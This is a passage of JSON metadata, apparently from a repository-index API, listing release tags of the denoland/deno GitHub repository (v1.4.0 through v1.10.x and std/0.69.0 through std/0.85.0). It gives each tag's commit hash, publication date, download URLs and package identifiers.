positories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependen